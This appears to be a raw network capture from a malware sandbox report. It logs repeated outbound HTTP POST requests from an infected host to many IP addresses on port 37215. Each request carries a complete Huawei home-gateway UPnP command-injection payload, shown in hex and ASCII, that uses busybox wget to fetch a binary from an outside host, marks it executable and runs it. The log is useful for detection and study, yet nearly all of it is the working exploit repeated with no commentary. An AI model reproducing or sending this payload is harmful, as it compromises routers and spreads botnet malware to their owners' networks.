                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2497192.168.2.1555222190.194.111.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552336931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2498192.168.2.1552732156.133.47.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552398920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2499192.168.2.1539212122.15.229.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552422047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2500192.168.2.1549836102.16.107.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552464008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2501192.168.2.1559602121.213.65.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552773952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2502192.168.2.154257645.149.239.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552809000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2503192.168.2.1533978197.207.22.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552860975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2504192.168.2.1543786186.190.211.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552880049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2505192.168.2.1553998181.146.111.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.552916050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2506192.168.2.1551882121.75.0.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.553728104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2507192.168.2.1553638102.12.214.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.553739071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
